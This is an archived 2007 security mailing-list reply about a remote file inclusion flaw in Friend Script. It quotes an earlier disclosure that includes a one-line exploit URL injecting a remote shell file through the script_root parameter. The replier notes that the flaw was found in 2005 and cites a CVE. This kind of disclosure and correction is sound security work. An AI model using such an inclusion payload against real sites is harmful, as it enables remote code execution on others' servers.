OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Re: Friend Script 2.5 - 2.4 Remote File İnclude

From: security curmudgeon (jerichoattrition.org)
Date: Thu Dec 06 2007 - 18:02:25 CST


: Olmek Var$a Kaderde Dert Ekleme Derdine Team :)

: Portal:Friend Script 2.5 - 2.4 Remote File İnclude Vulnerable
: Author:Yollubunlar
: http://yollubunlar.Org
:
: Exploit:script_path/inc/tell_a_friend.inc.php?script_root=Sh3ll.txt?

This was discovered on 2005-03-07 and reported for version 2.7 before
20050305.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-0679